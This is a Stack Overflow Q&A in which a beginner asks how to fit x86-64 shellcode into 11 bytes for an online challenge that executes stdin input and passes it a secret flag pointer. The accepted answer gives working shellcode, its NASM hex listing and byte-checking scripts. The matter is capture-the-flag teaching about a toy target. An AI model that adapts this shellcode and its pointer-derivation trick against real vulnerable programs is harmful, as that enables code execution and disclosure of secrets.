Compact shellcode to print a 0-terminated string pointed-to by a register, given puts or printf at known absolute addresses?

Question

Background: I am a beginner trying to understand how to golf assembly, in particular to solve an online challenge.

EDIT: clarification: I want to print the string stored at the memory address held in RDX, i.e. “SUPER SECRET!”

Create some shellcode that can output the value of register RDX in <= 11 bytes. Null bytes are not allowed.

The program is linked against the C standard library, so I have access to the puts / printf functions. It’s running on x86-64 (amd64).

$rax   : 0x0000000000010000  →  0x0000000ac343db31
$rdx   : 0x0000555555559480  →  "SUPER SECRET!"
gef➤  info address puts
Symbol "puts" is at 0x7ffff7e3c5a0 in a file compiled without debugging.
gef➤  info address printf
Symbol "printf" is at 0x7ffff7e19e10 in a file compiled without debugging.

Here is my attempt (intel syntax)

xor ebx, ebx ; zero the ebx register
inc ebx ; set the ebx register to 1 (STDOUT)
xchg ecx, edx ; set the ECX register to RDX
mov edx, 0xff ; set the length to 255
mov eax, 0x4 ; set the syscall to print
int 0x80 ; interrupt

hexdump of my code

My attempt is 17 bytes and includes null bytes, which aren't allowed. What other ways can I lower the byte count? Is there a way to call puts / printf while still saving bytes?

FULL DETAILS:

I am not quite sure what is useful information and what isn't.

File details:

ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5810a6deb6546900ba259a5fef69e1415501b0e6, not stripped

Source code:

void main() {
        char* flag = get_flag(); // I don't get access to the function details
        char* shellcode = (char*) mmap((void*) 0x1337,12, 0, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        mprotect(shellcode, 12, PROT_READ | PROT_WRITE | PROT_EXEC);
        fgets(shellcode, 12, stdin);
        ((void (*)(char*))shellcode)(flag);
}

Disassembly of main:

gef➤  disass main
Dump of assembler code for function main:
   0x00005555555551de <+0>:     push   rbp
   0x00005555555551df <+1>:     mov    rbp,rsp
=> 0x00005555555551e2 <+4>:     sub    rsp,0x10
   0x00005555555551e6 <+8>:     mov    eax,0x0
   0x00005555555551eb <+13>:    call   0x555555555185 <get_flag>
   0x00005555555551f0 <+18>:    mov    QWORD PTR [rbp-0x8],rax
   0x00005555555551f4 <+22>:    mov    r9d,0x0
   0x00005555555551fa <+28>:    mov    r8d,0xffffffff
   0x0000555555555200 <+34>:    mov    ecx,0x22
   0x0000555555555205 <+39>:    mov    edx,0x0
   0x000055555555520a <+44>:    mov    esi,0xc
   0x000055555555520f <+49>:    mov    edi,0x1337
   0x0000555555555214 <+54>:    call   0x555555555030 <mmap@plt>
   0x0000555555555219 <+59>:    mov    QWORD PTR [rbp-0x10],rax
   0x000055555555521d <+63>:    mov    rax,QWORD PTR [rbp-0x10]
   0x0000555555555221 <+67>:    mov    edx,0x7
   0x0000555555555226 <+72>:    mov    esi,0xc
   0x000055555555522b <+77>:    mov    rdi,rax
   0x000055555555522e <+80>:    call   0x555555555060 <mprotect@plt>
   0x0000555555555233 <+85>:    mov    rdx,QWORD PTR [rip+0x2e26]        # 0x555555558060 <stdin@@GLIBC_2.2.5>
   0x000055555555523a <+92>:    mov    rax,QWORD PTR [rbp-0x10]
   0x000055555555523e <+96>:    mov    esi,0xc
   0x0000555555555243 <+101>:   mov    rdi,rax
   0x0000555555555246 <+104>:   call   0x555555555040 <fgets@plt>
   0x000055555555524b <+109>:   mov    rax,QWORD PTR [rbp-0x10]
   0x000055555555524f <+113>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x0000555555555253 <+117>:   mov    rdi,rdx
   0x0000555555555256 <+120>:   call   rax
   0x0000555555555258 <+122>:   nop
   0x0000555555555259 <+123>:   leave
   0x000055555555525a <+124>:   ret

Register state right before shellcode is executed:

$rax   : 0x0000000000010000  →  "EXPLOIT\n"
$rbx   : 0x0000555555555260  →  <__libc_csu_init+0> push r15
$rcx   : 0x000055555555a4e8  →  0x0000000000000000
$rdx   : 0x0000555555559480  →  "SUPER SECRET!"
$rsp   : 0x00007fffffffd940  →  0x0000000000010000  →  "EXPLOIT\n"
$rbp   : 0x00007fffffffd950  →  0x0000000000000000
$rsi   : 0x4f4c5058
$rdi   : 0x00007ffff7fa34d0  →  0x0000000000000000
$rip   : 0x0000555555555253  →  <main+117> mov rdi, rdx
$r8    : 0x0000000000010000  →  "EXPLOIT\n"
$r9    : 0x7c
$r10   : 0x000055555555448f  →  "mprotect"
$r11   : 0x246
$r12   : 0x00005555555550a0  →  <_start+0> xor ebp, ebp
$r13   : 0x00007fffffffda40  →  0x0000000000000001
$r14   : 0x0
$r15   : 0x0

(This register state is a snapshot at the assembly line below)

●→ 0x555555555253 <main+117>       mov    rdi, rdx
   0x555555555256 <main+120>       call   rax

`gets` is dangerous, you should never use it. And your question is operating system, processor, and calling convention specific. Did you read wikipedia on [x86 calling conventions](https://en.wikipedia.org/wiki/X86_calling_conventions)? Are you allowed to use [libgccjit](https://gcc.gnu.org/onlinedocs/jit/) ? Did you study the source code of simple C compilers like [tinycc](https://en.wikipedia.org/wiki/Tiny_C_Compiler) ? Did you compile some C code with [GCC](http://gcc.gnu.org/) invoked as `gcc -Wall -Wextra -fverbose-asm -O2 -S` — Basile Starynkevitch, Apr 24 '21 at 06:07
@BasileStarynkevitch Thanks for your comment. I have edited the question to include architecture and assembly flavor. I am a little confused why you mention “gets” as my code is trying to run “puts” though? — Peter Stenger, Apr 24 '21 at 06:11
You want to output `0x0000555555559480`? Or as decimal, see [How do I print an integer in Assembly Level Programming without printf from the c library?](https://stackoverflow.com/a/46301894) for doing it without printf. Or did you mean the string *pointed-to* by RDX? Also, I don't see why you're using 32-bit `int 0x80` in 64-bit code. RSP and RDX are both outside the low 32 bits, so you can't pass a buffer to `write` via that ABI. [What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?](https://stackoverflow.com/q/46087730) — Peter Cordes, Apr 24 '21 at 06:13
@PeterCordes The string at that memory address. Sorry for the confusion. — Peter Stenger, Apr 24 '21 at 06:14
Your question needs some [mre] - so some C or assembler code with the commands used to compile or assemble it. Read documentation of [GCC](http://gcc.gnu.org/) and of [GNU binutils](https://www.gnu.org/software/binutils/) and specifications like the [Linux x86-64 ABI](https://refspecs.linuxbase.org/elf/x86_64-abi-0.99.pdf) — Basile Starynkevitch, Apr 24 '21 at 06:14
Is the string 0-terminated, so you could pass it to `printf("%c%s\n", dummy, rdx)`, for example? Or `push rdx` / `pop rdi` for `jmp puts`? But this is supposed to be shellcode, so are you *sure* you can call libc functions? A `jmp` or `call rel32` won't reach unless you know the relative distance between your shellcode location and the libc address (or their PLT stubs), and that distance is within +-2GiB. Oh, it gives you their absolute addresses; I guess it's dangling that in front of you if you want to try to `jmp reg`, since you apparently don't know your own address? — Peter Cordes, Apr 24 '21 at 06:19
@PeterCordes These are all great comments. I’m sorry for an incomplete post, I will update this question with all these additional details in the morning. — Peter Stenger, Apr 24 '21 at 06:23
@BasileStarynkevitch: Even `clang -Oz` for code-size optimization is unlikely to make something useful, even if you come up with a strategy to try (like call via func ptr). I think you haven't understood the question, which is about writing *shellcode* to run in the environment described in the question. It's not missing a [mcve] per-se; it contains a broken attempt but is asking for alternatives, not specifically how to fix that. (Although it would be good if the question realized that the attempt wouldn't work, and had a test-case so people could play with this other than in their heads.) — Peter Cordes, Apr 24 '21 at 06:25
The code you've given uses a system call directly. If you want to use a c library function, just use the `call` instruction. — Emanuel P, Apr 24 '21 at 06:26
@EmanuelP: "just" use `call`? Not that simple from shellcode, see my previous comment. You aren't given your shellcode's own address (so IDK how a code-injection exploit was supposed to have transferred control to your executable payload in the first place without knowing an absolute return address.) But anyway, it seems the code has to run from a random (stack?) address, so you can't include a `call rel32` or `jmp rel32` to reach either of the specified absolute addresses for `printf` or `puts`. If you mean `mov rax, 0x7ffff7e3c5a0` / `call rax`, that's already 12 bytes and includes zeros. — Peter Cordes, Apr 24 '21 at 06:30
@PeterCordes I am just adding more details now, please take another look. Thanks for your patience. — Peter Stenger, Apr 24 '21 at 06:34
@PeterCordes I just now added the register states as well, if that is something that could be helpful. I hope I'm not overdoing the details... — Peter Stenger, Apr 24 '21 at 06:41
Huh, surprisingly mmap does still work with a hint address that's not page-aligned (like `0x1337`). It returns `0x10000` ([mmap_min_addr](https://wiki.debian.org/mmap_min_addr), the nearest legal page address), I guess that's why you have RAX=0x10000 in a debug build, because that's your function pointer. It also doesn't make sense to `mprotect` a size of 12 bytes because it actually applies to the whole page, but Linux allows that, too. (And yeah, `fgets` will read a 0-terminated string from stdin, limited to 11 bytes before the 0. And also stopping at a newline 0xa byte) — Peter Cordes, Apr 24 '21 at 06:44
Oh, you're allowed to take advantage of known other registers like RSP, RBP, and RDI? They're within 2GiB of printf and puts so you can make a function pointer with only a rel32 (e.g. using LEA or ADD). — Peter Cordes, Apr 24 '21 at 06:46
@PeterCordes that’s gotta be it. I didn’t think about using existing register values and performing math to get to the correct printf/puts address. — Peter Stenger, Apr 24 '21 at 06:49
Also I said null bytes aren’t allowed because from my understanding it would not work correctly with null bytes. I’m sure you have a much deeper understanding, so if they work, they are allowed haha — Peter Stenger, Apr 24 '21 at 06:54
Yup, using LEA that way is a variation of [Tips for golfing in x86/x64 machine code](https://codegolf.stackexchange.com/a/132985) - using stuff like `lea ecx, [rax + 4]` to set ECX=4 given a known value of `0` in EAX. — Peter Cordes, Apr 24 '21 at 07:00
re: `0` bytes (ASCII NUL): `fgets` actually *can* read a `0`, my earlier comment was wrong to list that as another byte to avoid. The critical character is `0xa` aka `'\n'` newline, *not* `'\0'`. See [Is it possible to read null characters correctly using fgets or gets\_s?](https://stackoverflow.com/a/50160115). Often buffer overflows exploit a `strcpy` or something else that stops on a `0` byte, but `fgets` only stops on EOF, newline, or the buffer size. (This program is using it to simulate plain `gets` which doesn't take a buffer size, so can be vulnerable to buffer overflow.) — Peter Cordes, Apr 24 '21 at 07:06

score 1 · Accepted Answer · answered Apr 24 '21 at 08:04

Since I already spilled the beans and "spoiled" the answer to the online challenge in comments, I might as well write it up. 2 key tricks:

Create 0x7ffff7e3c5a0 (&puts) in a register with lea reg, [reg + disp32], using the known value of RDI which is within the +-2^31 range of a disp32. (Or use RBP as a starting point, but not RSP: that would need a SIB byte in the addressing mode).

This is a generalization of the code-golf trick of using lea edi, [rax+1] to create small constants from other small constants (especially 0) in 3 bytes, with code that runs less slowly than push imm8 / pop reg.

The disp32 is large enough to not have any zero bytes; you have a couple registers to choose from in case one had been too close.
Copy a 64-bit register in 2 bytes with push reg / pop reg, instead of 3-byte mov rdi, rdx (REX + opcode + modrm). No savings if either the push or the pop needs a REX prefix (for R8..R15), and it actually costs bytes if both are "non-legacy" registers.

See other answers on Tips for golfing in x86/x64 machine code on codegolf.SE for more.
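As a sanity check on the first trick, here is a small Python sketch of how the disp32 can be derived and screened for awkward bytes. The addresses are the ones from the question's GDB output (the RDI value is the one shown in the register snapshot), so they only apply to that run; the helper names are mine and purely illustrative.

```python
# Addresses copied from the question's GDB session; they are specific to that run.
PUTS_ADDR = 0x7ffff7e3c5a0    # "info address puts"
RDI_IN_DUMP = 0x7ffff7fa34d0  # $rdi as shown in the register snapshot


def disp32_bytes(target: int, base: int) -> bytes:
    """Return the little-endian disp32 such that base + disp == target."""
    disp = target - base
    if not -2**31 <= disp < 2**31:
        raise ValueError("target is out of disp32 range from this base")
    return disp.to_bytes(4, "little", signed=True)


def has_bad_bytes(data: bytes) -> bool:
    """True if data contains a NUL (challenge rule) or a newline (fgets stops there)."""
    return 0x00 in data or 0x0A in data


disp = disp32_bytes(PUTS_ADDR, RDI_IN_DUMP)
print(hex(PUTS_ADDR - RDI_IN_DUMP))  # -0x166f30
print(disp.hex())                    # d090e9ff
print(has_bad_bytes(disp))           # False
```

If the chosen base register had produced a displacement containing a 0x00 or 0x0a byte, the same helper could be rerun with another nearby register value (RBP, for instance) to look for a cleaner one.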

bits 64
  lea  rsi, [rdi - 0x166f30]
       ;; add rbp, imm32          ; alternative, but that would mess up a call-preserved register so we might crash on return.
  push rdx
  pop  rdi      ; copy RDX to first arg, x86-64 SysV calling convention
  jmp  rsi      ; tailcall puts

This is exactly 11 bytes, and I don't see a way for it to be smaller. add r64, imm32 is also 7 bytes, same as LEA. (Or 6 bytes if the register is RAX, but even the xchg rax, rdi short form would cost 2 bytes to get it there, and the RAX value is still the fgets return value, which is the small mmap buffer address.)

The puts function pointer doesn't fit in 32 bits, so we need a REX prefix on any instruction that puts it into a register. Otherwise we could just mov reg, imm32 (5 bytes) with the absolute address, not deriving it from another register.

$ nasm -fbin -o exploit.bin -l /dev/stdout exploit.asm
     1                                  bits 64
     2 00000000 488DB7D090E9FF          lea  rsi, [rdi - 0x166f30]
     3                                  ;; add rbp, imm32          ; we can avoid messing up any call-preserved registers
     4 00000007 52                      push rdx
     5 00000008 5F                      pop  rdi      ; copy to first arg
     6 00000009 FFE6                    jmp  rsi      ; tailcall
$ ll exploit.bin
-rw-r--r-- 1 peter peter 11 Apr 24 04:09 exploit.bin
$ ./a.out < exploit.bin      # would work if the addresses in my build matched yours
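A quick way to double-check the payload against the challenge limits is to take the hex column of the listing above and test it in Python. This is only a sketch: the function name and the default limit of 11 bytes are my own framing of the rules stated in the question.

```python
# Machine code copied from the hex column of the NASM listing.
shellcode = bytes.fromhex(
    "488DB7D090E9FF"  # lea  rsi, [rdi - 0x166f30]
    "52"              # push rdx
    "5F"              # pop  rdi
    "FFE6"            # jmp  rsi
)


def fits_challenge(code: bytes, max_len: int = 11) -> bool:
    """True if code is short enough and has no NUL (challenge rule) or newline (fgets)."""
    return len(code) <= max_len and 0x00 not in code and 0x0A not in code


print(len(shellcode), fits_challenge(shellcode))  # 11 True
```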

My build of your incomplete .c uses different addresses on my machine, but it does reach this code (at address 0x10000, mmap_min_addr which mmap picks after the amusing choice of 0x1337 as a hint address, which isn't even page aligned but doesn't result in EINVAL on current Linux.)

Since we only tailcall puts with correct stack alignment and don't modify any call-preserved registers, this should successfully return to main.

Note that 0 bytes (ASCII NUL, not NULL) would actually work in shellcode for this test program, if not for the requirement that forbids it.

The input is read using fgets (apparently to simulate a gets() overflow). fgets actually can read a 0 aka '\0'; the only critical character is 0xa aka '\n' newline. See "Is it possible to read null characters correctly using fgets or gets_s?"

Often buffer overflows exploit a strcpy or something else that stops on a 0 byte, but fgets only stops on EOF or newline. (Or the buffer size, a feature gets is missing, hence its deprecation and removal from even the ISO C standard library! It's literally impossible to use safely unless you control the input data). So yes, it's totally normal to forbid zero bytes.
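To make the stopping rule concrete, here is a toy Python model of it. It is not libc's fgets, just a sketch of the behaviour described above: copy at most size-1 bytes and stop after a newline, with no special treatment of 0 bytes.

```python
def fgets_model(stream: bytes, size: int) -> bytes:
    """Toy model of fgets(buf, size, fp): at most size-1 bytes, stopping after a newline."""
    out = bytearray()
    for b in stream:
        if len(out) >= size - 1:
            break          # buffer limit reached (room is kept for the terminator)
        out.append(b)
        if b == 0x0A:
            break          # newline is stored, then reading stops
    return bytes(out)


# A 0 byte in the middle is read like any other byte; the newline ends the read.
print(fgets_model(b"\x90\x00\x90\x90\nrest", 12))
# With no newline, the size limit of 12 yields 11 payload bytes.
print(len(fgets_model(b"A" * 20, 12)))  # 11
```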

BTW, your int 0x80 attempt is not viable (see "What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?"): you can't use the 32-bit ABI to pass 64-bit pointers to write, and the string you want to output is not in the low 32 bits of virtual address space.
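The truncation can be illustrated with the pointer from the question's register dump. This is just arithmetic in Python, with a made-up helper name, assuming the 32-bit ABI looks only at the low 32 bits of each argument register:

```python
FLAG_PTR = 0x0000555555559480  # $rdx from the question's register dump


def as_seen_by_int80(reg: int) -> int:
    """Keep only the low 32 bits, as the 32-bit int 0x80 ABI does with its arguments."""
    return reg & 0xFFFF_FFFF


print(hex(as_seen_by_int80(FLAG_PTR)))         # 0x55559480
print(as_seen_by_int80(FLAG_PTR) == FLAG_PTR)  # False
```

The kernel would be handed 0x55559480 as the buffer address, which is not where the string lives.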

Of course, with the 64-bit syscall ABI, you're fine if you can hardcode the length.

    push rdx
    pop  rsi
    shr  eax, 16    ; fun 3-byte way to turn 0x10000 into 1 (__NR_write, 64-bit), instead of just push 1 / pop
    mov  edi, eax   ; STDOUT_FD = __NR_write 
    lea  edx, [rax + 13 - 1]       ; 3 bytes.  RDX = 13 = string length
      ; or   mov dl, 0xff          ; 2 bytes  leaving garbage in rest of RDX
    syscall

But this is 12 bytes, as well as hard-coding the length of the string (which was supposed to be part of the secret?).

mov dl, 0xff could make sure the length was at least 255, and actually much more in this case, if you don't mind getting reams of garbage after the string you want, until write hits an unmapped page and returns early. That would save a byte, making this 11.
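The byte counts for the two syscall variants can be tallied with a short Python sketch. The encodings below are written out by hand for illustration, so treat an assembler listing as the authority; the variable and function names are mine.

```python
# Hand-written encodings for illustration; check against an assembler listing.
common = [
    ("push rdx",     "52"),
    ("pop  rsi",     "5E"),
    ("shr  eax, 16", "C1E810"),
    ("mov  edi, eax", "89C7"),
]
length_exact = ("lea edx, [rax + 12]", "8D500C")  # RDX = 13 once RAX = 1
length_sloppy = ("mov dl, 0xff", "B2FF")          # leaves garbage in the rest of RDX
syscall = ("syscall", "0F05")


def assemble(parts) -> bytes:
    """Concatenate the hex encodings of a list of (mnemonic, hex) pairs."""
    return b"".join(bytes.fromhex(hex_bytes) for _, hex_bytes in parts)


exact = assemble(common + [length_exact, syscall])
sloppy = assemble(common + [length_sloppy, syscall])
print(len(exact), len(sloppy))  # 12 11
```

Only the mov dl variant fits in the 11 bytes that fgets(shellcode, 12, stdin) will read.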

(Fun fact, Linux write does not return an error when it's successfully written some bytes; instead it returns how many it did write. If you try again with buf + write_len, you would get a -EFAULT return value for passing a bad pointer to write.)

(I was going to put the code blocks in spoiler quotes to at least hide the fully worked out copy-pasteable version, but it seems markdown doesn't allow that.) — Peter Cordes, Apr 24 '21 at 08:05
Hi Peter, It appears that I messed up my initial question. After the `mov rdi, rdx` command, the value in RDI would be overwritten with `"SUPER SECRET"`, so we cannot use the value in that register to set the address. — Peter Stenger, Apr 24 '21 at 16:21
@PeterStenger: That's why my shellcode calculates a function pointer in another register, using LEA to copy-and-add, *before* overwriting RDI with RDX. I picked RSI, I could have picked RAX or RCX. (Any call-clobbered register that doesn't need a REX for `jmp reg`, and which isn't RDX or RDI. So that leaves RSI, RAX, and RCX). Try single-stepping it in GDB. — Peter Cordes, Apr 25 '21 at 00:44
